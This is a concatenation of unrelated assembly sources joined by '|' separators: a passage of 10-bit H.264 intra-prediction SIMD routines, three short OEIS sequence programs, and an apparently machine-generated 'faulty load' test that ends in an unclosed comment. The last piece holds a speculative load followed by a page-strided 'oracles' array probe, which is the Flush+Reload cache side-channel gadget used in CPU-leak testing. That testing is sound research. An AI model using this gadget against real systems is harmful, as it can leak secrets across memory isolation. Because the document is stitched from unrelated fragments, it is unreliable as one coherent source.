pshufw m1, m1, 0xFF
movq [r1+r2*2], m1
movd [r1+r2*1+4], m1
pshufw m2, m0, 11111001b
movq m1, m2
pavgw m2, m0
pshufw m5, m0, 11111110b
PRED4x4_LOWPASS m1, m0, m5, m1
movq m6, m2
punpcklwd m6, m1
movq [r0+r2*1], m6
psrlq m2, 16
psrlq m1, 16
punpcklwd m2, m1
movq [r0+r2*2], m2
psrlq m2, 32
movd [r1+r2*1], m2
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_vertical(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_vertical_10, 2, 2
sub r0, r1
mova m0, [r0]
%rep 3
mova [r0+r1*1], m0
mova [r0+r1*2], m0
lea r0, [r0+r1*2]
%endrep
mova [r0+r1*1], m0
mova [r0+r1*2], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_horizontal(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_horizontal_10, 2, 3
mov r2d, 4
.loop:
movq m0, [r0+r1*0-8]
movq m1, [r0+r1*1-8]
pshuflw m0, m0, 0xff
pshuflw m1, m1, 0xff
punpcklqdq m0, m0
punpcklqdq m1, m1
mova [r0+r1*0], m0
mova [r0+r1*1], m1
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
;-----------------------------------------------------------------------------
; void ff_predict_8x8_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro MOV8 2-3
; sort of a hack, but it works
%if mmsize==8
movq [%1+0], %2
movq [%1+8], %3
%else
movdqa [%1], %2
%endif
%endmacro
%macro PRED8x8_DC 1
cglobal pred8x8_dc_10, 2, 6
sub r0, r1
pxor m4, m4
movq m0, [r0+0]
movq m1, [r0+8]
%if mmsize==16
punpcklwd m0, m1
movhlps m1, m0
paddw m0, m1
%else
pshufw m2, m0, 00001110b
pshufw m3, m1, 00001110b
paddw m0, m2
paddw m1, m3
punpcklwd m0, m1
%endif
%1 m2, m0, 00001110b
paddw m0, m2
lea r5, [r1*3]
lea r4, [r0+r1*4]
movzx r2d, word [r0+r1*1-2]
movzx r3d, word [r0+r1*2-2]
add r2d, r3d
movzx r3d, word [r0+r5*1-2]
add r2d, r3d
movzx r3d, word [r4-2]
add r2d, r3d
movd m2, r2d ; s2
movzx r2d, word [r4+r1*1-2]
movzx r3d, word [r4+r1*2-2]
add r2d, r3d
movzx r3d, word [r4+r5*1-2]
add r2d, r3d
movzx r3d, word [r4+r1*4-2]
add r2d, r3d
movd m3, r2d ; s3
punpcklwd m2, m3
punpckldq m0, m2 ; s0, s1, s2, s3
%1 m3, m0, 11110110b ; s2, s1, s3, s3
%1 m0, m0, 01110100b ; s0, s1, s3, s1
paddw m0, m3
psrlw m0, 2
pavgw m0, m4 ; s0+s2, s1, s3, s1+s3
%if mmsize==16
punpcklwd m0, m0
pshufd m3, m0, 11111010b
punpckldq m0, m0
SWAP 0,1
%else
pshufw m1, m0, 0x00
pshufw m2, m0, 0x55
pshufw m3, m0, 0xaa
pshufw m4, m0, 0xff
%endif
MOV8 r0+r1*1, m1, m2
MOV8 r0+r1*2, m1, m2
MOV8 r0+r5*1, m1, m2
MOV8 r0+r1*4, m1, m2
MOV8 r4+r1*1, m3, m4
MOV8 r4+r1*2, m3, m4
MOV8 r4+r5*1, m3, m4
MOV8 r4+r1*4, m3, m4
RET
%endmacro
INIT_MMX mmxext
PRED8x8_DC pshufw
INIT_XMM sse2
PRED8x8_DC pshuflw
;-----------------------------------------------------------------------------
; void ff_pred8x8_top_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_top_dc_10, 2, 4
sub r0, r1
mova m0, [r0]
pshuflw m1, m0, 0x4e
pshufhw m1, m1, 0x4e
paddw m0, m1
pshuflw m1, m0, 0xb1
pshufhw m1, m1, 0xb1
paddw m0, m1
lea r2, [r1*3]
lea r3, [r0+r1*4]
paddw m0, [pw_2]
psrlw m0, 2
mova [r0+r1*1], m0
mova [r0+r1*2], m0
mova [r0+r2*1], m0
mova [r0+r1*4], m0
mova [r3+r1*1], m0
mova [r3+r1*2], m0
mova [r3+r2*1], m0
mova [r3+r1*4], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_plane(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_plane_10, 2, 7, 7
sub r0, r1
lea r2, [r1*3]
lea r3, [r0+r1*4]
mova m2, [r0]
pmaddwd m2, [pw_m32101234]
HADDD m2, m1
movd m0, [r0-4]
psrld m0, 14
psubw m2, m0 ; H
movd m0, [r3+r1*4-4]
movd m1, [r0+12]
paddw m0, m1
psllw m0, 4 ; 16*(src[7*stride-1] + src[-stride+7])
movzx r4d, word [r3+r1*1-2] ; src[4*stride-1]
movzx r5d, word [r0+r2*1-2] ; src[2*stride-1]
sub r4d, r5d
movzx r6d, word [r3+r1*2-2] ; src[5*stride-1]
movzx r5d, word [r0+r1*2-2] ; src[1*stride-1]
sub r6d, r5d
lea r4d, [r4+r6*2]
movzx r5d, word [r3+r2*1-2] ; src[6*stride-1]
movzx r6d, word [r0+r1*1-2] ; src[0*stride-1]
sub r5d, r6d
lea r5d, [r5*3]
add r4d, r5d
movzx r6d, word [r3+r1*4-2] ; src[7*stride-1]
movzx r5d, word [r0+r1*0-2] ; src[ -stride-1]
sub r6d, r5d
lea r4d, [r4+r6*4]
movd m3, r4d ; V
punpckldq m2, m3
pmaddwd m2, [pd_17]
paddd m2, [pd_16]
psrad m2, 5 ; b, c
mova m3, [pw_pixel_max]
pxor m1, m1
SPLATW m0, m0, 1
SPLATW m4, m2, 2
SPLATW m2, m2, 0
pmullw m2, [pw_m32101234] ; b
pmullw m5, m4, [pw_m3] ; c
paddw m5, [pw_16]
mov r2d, 8
add r0, r1
.loop:
paddsw m6, m2, m5
paddsw m6, m0
psraw m6, 5
CLIPW m6, m1, m3
mova [r0], m6
paddw m5, m4
add r0, r1
dec r2d
jg .loop
REP_RET
;-----------------------------------------------------------------------------
; void ff_pred8x8l_128_dc(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_128_DC 0
cglobal pred8x8l_128_dc_10, 4, 4
mova m0, [pw_512] ; (1<<(BIT_DEPTH-1))
lea r1, [r3*3]
lea r2, [r0+r3*4]
MOV8 r0+r3*0, m0, m0
MOV8 r0+r3*1, m0, m0
MOV8 r0+r3*2, m0, m0
MOV8 r0+r1*1, m0, m0
MOV8 r2+r3*0, m0, m0
MOV8 r2+r3*1, m0, m0
MOV8 r2+r3*2, m0, m0
MOV8 r2+r1*1, m0, m0
RET
%endmacro
INIT_MMX mmxext
PRED8x8L_128_DC
INIT_XMM sse2
PRED8x8L_128_DC
;-----------------------------------------------------------------------------
; void ff_pred8x8l_top_dc(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_TOP_DC 0
cglobal pred8x8l_top_dc_10, 4, 4, 6
sub r0, r3
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
lea r1, [r3*3]
lea r2, [r0+r3*4]
PRED4x4_LOWPASS m0, m2, m1, m0
HADDW m0, m1
paddw m0, [pw_4]
psrlw m0, 3
SPLATW m0, m0, 0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r1*1], m0
mova [r0+r3*4], m0
mova [r2+r3*1], m0
mova [r2+r3*2], m0
mova [r2+r1*1], m0
mova [r2+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_TOP_DC
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_TOP_DC
%endif
;-------------------------------------------------------------------------------
; void ff_pred8x8l_dc(pixel *src, int has_topleft, int has_topright, int stride)
;-------------------------------------------------------------------------------
;TODO: see if scalar is faster
%macro PRED8x8L_DC 0
cglobal pred8x8l_dc_10, 4, 6, 6
sub r0, r3
lea r4, [r0+r3*4]
lea r5, [r3*3]
mova m0, [r0+r3*2-16]
punpckhwd m0, [r0+r3*1-16]
mova m1, [r4+r3*0-16]
punpckhwd m1, [r0+r5*1-16]
punpckhdq m1, m0
mova m2, [r4+r3*2-16]
punpckhwd m2, [r4+r3*1-16]
mova m3, [r4+r3*4-16]
punpckhwd m3, [r4+r5*1-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
not r1
and r1, r3
pslldq m4, m3, 2
psrldq m5, m3, 2
pshuflw m4, m4, 11100101b
pinsrw m5, [r0+r1-2], 7
PRED4x4_LOWPASS m3, m4, m5, m3
PRED4x4_LOWPASS m0, m2, m1, m0
paddw m0, m3
HADDW m0, m1
paddw m0, [pw_8]
psrlw m0, 4
SPLATW m0, m0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r5*1], m0
mova [r0+r3*4], m0
mova [r4+r3*1], m0
mova [r4+r3*2], m0
mova [r4+r5*1], m0
mova [r4+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_DC
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DC
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_vertical(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_VERTICAL 0
cglobal pred8x8l_vertical_10, 4, 4, 6
sub r0, r3
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
lea r1, [r3*3]
lea r2, [r0+r3*4]
PRED4x4_LOWPASS m0, m2, m1, m0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r1*1], m0
mova [r0+r3*4], m0
mova [r2+r3*1], m0
mova [r2+r3*2], m0
mova [r2+r1*1], m0
mova [r2+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_VERTICAL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_VERTICAL
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_horizontal(uint8_t *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_HORIZONTAL 0
cglobal pred8x8l_horizontal_10, 4, 4, 5
mova m0, [r0-16]
shr r1d, 14
dec r1
and r1, r3
sub r1, r3
punpckhwd m0, [r0+r1-16]
mova m1, [r0+r3*2-16]
punpckhwd m1, [r0+r3*1-16]
lea r2, [r0+r3*4]
lea r1, [r3*3]
punpckhdq m1, m0
mova m2, [r2+r3*0-16]
punpckhwd m2, [r0+r1-16]
mova m3, [r2+r3*2-16]
punpckhwd m3, [r2+r3*1-16]
punpckhdq m3, m2
punpckhqdq m3, m1
PALIGNR m4, m3, [r2+r1-16], 14, m0
pslldq m0, m4, 2
pshuflw m0, m0, 11100101b
PRED4x4_LOWPASS m4, m3, m0, m4
punpckhwd m3, m4, m4
punpcklwd m4, m4
pshufd m0, m3, 0xff
pshufd m1, m3, 0xaa
pshufd m2, m3, 0x55
pshufd m3, m3, 0x00
mova [r0+r3*0], m0
mova [r0+r3*1], m1
mova [r0+r3*2], m2
mova [r0+r1*1], m3
pshufd m0, m4, 0xff
pshufd m1, m4, 0xaa
pshufd m2, m4, 0x55
pshufd m3, m4, 0x00
mova [r2+r3*0], m0
mova [r2+r3*1], m1
mova [r2+r3*2], m2
mova [r2+r1*1], m3
RET
%endmacro
INIT_XMM sse2
PRED8x8L_HORIZONTAL
INIT_XMM ssse3
PRED8x8L_HORIZONTAL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_HORIZONTAL
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_down_left(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_DOWN_LEFT 0
cglobal pred8x8l_down_left_10, 4, 4, 7
sub r0, r3
mova m3, [r0]
shr r1d, 14
neg r1
shr r2d, 13
pslldq m1, m3, 2
psrldq m2, m3, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
PRED4x4_LOWPASS m6, m2, m1, m3
jz .fix_tr ; flags from shr r2d
mova m1, [r0+16]
psrldq m5, m1, 2
PALIGNR m2, m1, m3, 14, m3
pshufhw m5, m5, 10100100b
PRED4x4_LOWPASS m1, m2, m5, m1
.do_topright:
lea r1, [r3*3]
psrldq m5, m1, 14
lea r2, [r0+r3*4]
PALIGNR m2, m1, m6, 2, m0
PALIGNR m3, m1, m6, 14, m0
PALIGNR m5, m1, 2, m0
pslldq m4, m6, 2
PRED4x4_LOWPASS m6, m4, m2, m6
PRED4x4_LOWPASS m1, m3, m5, m1
mova [r2+r3*4], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r1*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r3*2], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r2+r3*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r3*4], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r1*1], m1
PALIGNR m1, m6, 14, m2
pslldq m6, 2
mova [r0+r3*2], m1
PALIGNR m1, m6, 14, m6
mova [r0+r3*1], m1
RET
.fix_tr:
punpckhwd m3, m3
pshufd m1, m3, 0xFF
jmp .do_topright
%endmacro
INIT_XMM sse2
PRED8x8L_DOWN_LEFT
INIT_XMM ssse3
PRED8x8L_DOWN_LEFT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DOWN_LEFT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_down_right(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_DOWN_RIGHT 0
; standard forbids this when has_topleft is false
; no need to check
cglobal pred8x8l_down_right_10, 4, 5, 8
sub r0, r3
lea r4, [r0+r3*4]
lea r1, [r3*3]
mova m0, [r0+r3*1-16]
punpckhwd m0, [r0+r3*0-16]
mova m1, [r0+r1*1-16]
punpckhwd m1, [r0+r3*2-16]
punpckhdq m1, m0
mova m2, [r4+r3*1-16]
punpckhwd m2, [r4+r3*0-16]
mova m3, [r4+r1*1-16]
punpckhwd m3, [r4+r3*2-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r4+r3*4-16]
mova m1, [r0]
PALIGNR m4, m3, m0, 14, m0
PALIGNR m1, m3, 2, m2
pslldq m0, m4, 2
pshuflw m0, m0, 11100101b
PRED4x4_LOWPASS m6, m1, m4, m3
PRED4x4_LOWPASS m4, m3, m0, m4
mova m3, [r0]
shr r2d, 13
pslldq m1, m3, 2
psrldq m2, m3, 2
pinsrw m1, [r0-2], 0
pinsrw m2, [r0+r2+14], 7
PRED4x4_LOWPASS m3, m2, m1, m3
PALIGNR m2, m3, m6, 2, m0
PALIGNR m5, m3, m6, 14, m0
psrldq m7, m3, 2
PRED4x4_LOWPASS m6, m4, m2, m6
PRED4x4_LOWPASS m3, m5, m7, m3
mova [r4+r3*4], m6
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*2], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r1*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r0+r3*4], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r4+r3*1], m3
PALIGNR m3, m6, 14, m2
pslldq m6, 2
mova [r4+r3*2], m3
PALIGNR m3, m6, 14, m6
mova [r4+r1*1], m3
RET
%endmacro
INIT_XMM sse2
PRED8x8L_DOWN_RIGHT
INIT_XMM ssse3
PRED8x8L_DOWN_RIGHT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DOWN_RIGHT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_vertical_right(pixel *src, int has_topleft,
; int has_topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_VERTICAL_RIGHT 0
; likewise with 8x8l_down_right
cglobal pred8x8l_vertical_right_10, 4, 5, 7
sub r0, r3
lea r4, [r0+r3*4]
lea r1, [r3*3]
mova m0, [r0+r3*1-16]
punpckhwd m0, [r0+r3*0-16]
mova m1, [r0+r1*1-16]
punpckhwd m1, [r0+r3*2-16]
punpckhdq m1, m0
mova m2, [r4+r3*1-16]
punpckhwd m2, [r4+r3*0-16]
mova m3, [r4+r1*1-16]
punpckhwd m3, [r4+r3*2-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r4+r3*4-16]
mova m1, [r0]
PALIGNR m4, m3, m0, 14, m0
PALIGNR m1, m3, 2, m2
PRED4x4_LOWPASS m3, m1, m4, m3
mova m2, [r0]
shr r2d, 13
pslldq m1, m2, 2
psrldq m5, m2, 2
pinsrw m1, [r0-2], 0
pinsrw m5, [r0+r2+14], 7
PRED4x4_LOWPASS m2, m5, m1, m2
PALIGNR m6, m2, m3, 12, m1
PALIGNR m5, m2, m3, 14, m0
PRED4x4_LOWPASS m0, m6, m2, m5
pavgw m2, m5
mova [r0+r3*2], m0
mova [r0+r3*1], m2
pslldq m6, m3, 4
pslldq m1, m3, 2
PRED4x4_LOWPASS m1, m3, m6, m1
PALIGNR m2, m1, 14, m4
mova [r0+r1*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m3
mova [r0+r3*4], m0
pslldq m1, 2
PALIGNR m2, m1, 14, m4
mova [r4+r3*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m3
mova [r4+r3*2], m0
pslldq m1, 2
PALIGNR m2, m1, 14, m4
mova [r4+r1*1], m2
pslldq m1, 2
PALIGNR m0, m1, 14, m1
mova [r4+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_VERTICAL_RIGHT
INIT_XMM ssse3
PRED8x8L_VERTICAL_RIGHT
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_VERTICAL_RIGHT
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_horizontal_up(pixel *src, int has_topleft,
; int has_topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_HORIZONTAL_UP 0
cglobal pred8x8l_horizontal_up_10, 4, 4, 6
mova m0, [r0+r3*0-16]
punpckhwd m0, [r0+r3*1-16]
shr r1d, 14
dec r1
and r1, r3
sub r1, r3
mova m4, [r0+r1*1-16]
lea r1, [r3*3]
lea r2, [r0+r3*4]
mova m1, [r0+r3*2-16]
punpckhwd m1, [r0+r1*1-16]
punpckhdq m0, m1
mova m2, [r2+r3*0-16]
punpckhwd m2, [r2+r3*1-16]
mova m3, [r2+r3*2-16]
punpckhwd m3, [r2+r1*1-16]
punpckhdq m2, m3
punpckhqdq m0, m2
PALIGNR m1, m0, m4, 14, m4
psrldq m2, m0, 2
pshufhw m2, m2, 10100100b
PRED4x4_LOWPASS m0, m1, m2, m0
psrldq m1, m0, 2
psrldq m2, m0, 4
pshufhw m1, m1, 10100100b
pshufhw m2, m2, 01010100b
pavgw m4, m0, m1
PRED4x4_LOWPASS m1, m2, m0, m1
punpckhwd m5, m4, m1
punpcklwd m4, m1
mova [r2+r3*0], m5
mova [r0+r3*0], m4
pshufd m0, m5, 11111001b
pshufd m1, m5, 11111110b
pshufd m2, m5, 11111111b
mova [r2+r3*1], m0
mova [r2+r3*2], m1
mova [r2+r1*1], m2
PALIGNR m2, m5, m4, 4, m0
PALIGNR m3, m5, m4, 8, m1
PALIGNR m5, m5, m4, 12, m4
mova [r0+r3*1], m2
mova [r0+r3*2], m3
mova [r0+r1*1], m5
RET
%endmacro
INIT_XMM sse2
PRED8x8L_HORIZONTAL_UP
INIT_XMM ssse3
PRED8x8L_HORIZONTAL_UP
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_HORIZONTAL_UP
%endif
;-----------------------------------------------------------------------------
; void ff_pred16x16_vertical(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro MOV16 3-5
mova [%1+ 0], %2
mova [%1+mmsize], %3
%if mmsize==8
mova [%1+ 16], %4
mova [%1+ 24], %5
%endif
%endmacro
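; MOV16 writes one 16-pixel (32-byte) row: two XMM stores, or four 8-byte MMX
; stores when mmsize == 8.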
%macro PRED16x16_VERTICAL 0
cglobal pred16x16_vertical_10, 2, 3
sub r0, r1
mov r2d, 8
mova m0, [r0+ 0]
mova m1, [r0+mmsize]
%if mmsize==8
mova m2, [r0+16]
mova m3, [r0+24]
%endif
.loop:
MOV16 r0+r1*1, m0, m1, m2, m3
MOV16 r0+r1*2, m0, m1, m2, m3
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_VERTICAL
INIT_XMM sse2
PRED16x16_VERTICAL
;-----------------------------------------------------------------------------
; void ff_pred16x16_horizontal(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_HORIZONTAL 0
cglobal pred16x16_horizontal_10, 2, 3
mov r2d, 8
.vloop:
movd m0, [r0+r1*0-4]
movd m1, [r0+r1*1-4]
SPLATW m0, m0, 1
SPLATW m1, m1, 1
MOV16 r0+r1*0, m0, m0, m0, m0
MOV16 r0+r1*1, m1, m1, m1, m1
lea r0, [r0+r1*2]
dec r2d
jg .vloop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_HORIZONTAL
INIT_XMM sse2
PRED16x16_HORIZONTAL
;-----------------------------------------------------------------------------
; void ff_pred16x16_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_DC 0
cglobal pred16x16_dc_10, 2, 6
mov r5, r0
sub r0, r1
mova m0, [r0+0]
paddw m0, [r0+mmsize]
%if mmsize==8
paddw m0, [r0+16]
paddw m0, [r0+24]
%endif
HADDW m0, m2
lea r0, [r0+r1-2]
movzx r3d, word [r0]
movzx r4d, word [r0+r1]
%rep 7
lea r0, [r0+r1*2]
movzx r2d, word [r0]
add r3d, r2d
movzx r2d, word [r0+r1]
add r4d, r2d
%endrep
lea r3d, [r3+r4+16]
movd m1, r3d
paddw m0, m1
psrlw m0, 5
SPLATW m0, m0
mov r3d, 8
.loop:
MOV16 r5+r1*0, m0, m0, m0, m0
MOV16 r5+r1*1, m0, m0, m0, m0
lea r5, [r5+r1*2]
dec r3d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_DC
INIT_XMM sse2
PRED16x16_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_top_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_TOP_DC 0
cglobal pred16x16_top_dc_10, 2, 3
sub r0, r1
mova m0, [r0+0]
paddw m0, [r0+mmsize]
%if mmsize==8
paddw m0, [r0+16]
paddw m0, [r0+24]
%endif
HADDW m0, m2
SPLATW m0, m0
paddw m0, [pw_8]
psrlw m0, 4
mov r2d, 8
.loop:
MOV16 r0+r1*1, m0, m0, m0, m0
MOV16 r0+r1*2, m0, m0, m0, m0
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_TOP_DC
INIT_XMM sse2
PRED16x16_TOP_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_left_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_LEFT_DC 0
cglobal pred16x16_left_dc_10, 2, 6
mov r5, r0
sub r0, 2
movzx r3d, word [r0]
movzx r4d, word [r0+r1]
%rep 7
lea r0, [r0+r1*2]
movzx r2d, word [r0]
add r3d, r2d
movzx r2d, word [r0+r1]
add r4d, r2d
%endrep
lea r3d, [r3+r4+8]
shr r3d, 4
movd m0, r3d
SPLATW m0, m0
mov r3d, 8
.loop:
MOV16 r5+r1*0, m0, m0, m0, m0
MOV16 r5+r1*1, m0, m0, m0, m0
lea r5, [r5+r1*2]
dec r3d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_LEFT_DC
INIT_XMM sse2
PRED16x16_LEFT_DC
;-----------------------------------------------------------------------------
; void ff_pred16x16_128_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro PRED16x16_128_DC 0
cglobal pred16x16_128_dc_10, 2,3
mova m0, [pw_512]
mov r2d, 8
.loop:
MOV16 r0+r1*0, m0, m0, m0, m0
MOV16 r0+r1*1, m0, m0, m0, m0
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
%endmacro
INIT_MMX mmxext
PRED16x16_128_DC
INIT_XMM sse2
PRED16x16_128_DC
|
; A049086: Number of tilings of 4 X 3n rectangle by 1 X 3 rectangles. Rotations and reflections are considered distinct tilings.
; 1,3,13,57,249,1087,4745,20713,90417,394691,1722917,7520929,32830585,143313055,625594449,2730863665,11920848033,52037243619,227154537661,991581805481,4328482658041,18894822411423,82480245888473,360045244866137,1571680309076689,6860746056673507
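; verified by tracing the loop below: $1 = 1, 3, 13, 57, 249, ... after
; successive passes, matching the data above.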
mov $1,1      ; a(0) = 1
lpb $0,1      ; repeat n times
  sub $0,1
  add $2,$1   ; $2 += a(k)
  add $3,$1   ; $3 += a(k)
  add $1,$3   ; a(k+1) = a(k) + 2*$3
  add $1,$3
  add $3,$2   ; $3 += $2
lpe           ; result in $1
|
; A010869: Constant sequence: a(n) = 30.
; 30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30,30
mov $1,30
|
; A177071: (7n + 3)(7n + 4).
; 12,110,306,600,992,1482,2070,2756,3540,4422,5402,6480,7656,8930,10302,11772,13340,15006,16770,18632,20592,22650,24806,27060,29412,31862,34410,37056,39800,42642,45582,48620,51756,54990,58322,61752,65280,68906,72630,76452,80372,84390,88506,92720,97032,101442,105950,110556,115260,120062,124962,129960,135056,140250,145542,150932,156420,162006,167690,173472,179352,185330,191406,197580,203852,210222,216690,223256,229920,236682,243542,250500,257556,264710,271962,279312,286760,294306,301950,309692,317532,325470,333506,341640,349872,358202,366630,375156,383780,392502,401322,410240,419256,428370,437582,446892,456300,465806,475410,485112
sub $1,$0   ; $1 = -n
bin $1,2    ; C(-n,2) = n*(n+1)/2
mul $1,98   ; 49*n*(n+1)
add $1,12   ; 49n^2 + 49n + 12 = (7n+3)*(7n+4)
mov $0,$1   ; output
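; check: n = 2 gives C(-2,2) = 3 and 98*3 + 12 = 306, the third term above.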
|
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %r8
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_A_ht+0x10217, %r8
nop
nop
nop
nop
cmp $10896, %rdx
movl $0x61626364, (%r8)
nop
cmp %rbp, %rbp
lea addresses_WC_ht+0x15f3, %r8
cmp %r15, %r15
mov $0x6162636465666768, %rax
movq %rax, %xmm1
vmovups %ymm1, (%r8)
nop
nop
cmp $39415, %rbp
lea addresses_UC_ht+0x1b477, %r12
nop
cmp $8342, %rsi
movb $0x61, (%r12)
nop
inc %r15
lea addresses_A_ht+0xbc57, %rsi
lea addresses_WT_ht+0x1cf17, %rdi
nop
sub %r12, %r12
mov $5, %rcx
rep movsq
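// the rep movsq above copies 5 qwords from addresses_A_ht+0xbc57 to addresses_WT_ht+0x1cf17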
nop
cmp %r8, %r8
lea addresses_A_ht+0x40d9, %rsi
lea addresses_D_ht+0x6017, %rdi
nop
nop
xor $21691, %r12
mov $27, %rcx
rep movsl
nop
sub %rbp, %rbp
lea addresses_A_ht+0xca17, %rdi
nop
nop
nop
nop
dec %rcx
movb $0x61, (%rdi)
nop
nop
nop
dec %r12
lea addresses_UC_ht+0x7884, %r15
nop
nop
nop
nop
nop
cmp $6577, %r12
mov (%r15), %r8d
nop
nop
xor %r15, %r15
lea addresses_D_ht+0xa317, %rdi
nop
nop
add $61768, %r8
mov $0x6162636465666768, %rdx
movq %rdx, %xmm5
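// align the destination down to 64 bytes: vmovntdq requires an aligned address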
and $0xffffffffffffffc0, %rdi
vmovntdq %ymm5, (%rdi)
add %rdi, %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r15
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r10
push %r8
push %rbx
push %rdi
push %rdx
// Faulty Load
lea addresses_US+0x1fa17, %rbx
nop
nop
nop
nop
nop
sub %r10, %r10
movups (%rbx), %xmm3
vpextrq $1, %xmm3, %r8
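// the low byte of the (possibly speculative) load indexes a page-strided
// (1 << 12) slot of the oracles array, a Flush+Reload-style cache
// covert-channel probe (inferred from the generated-test structure)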
lea oracles, %r10
and $0xff, %r8
shlq $12, %r8
mov (%r10,%r8,1), %r8
pop %rdx
pop %rdi
pop %rbx
pop %r8
pop %r10
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 10, 'NT': False, 'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False}}
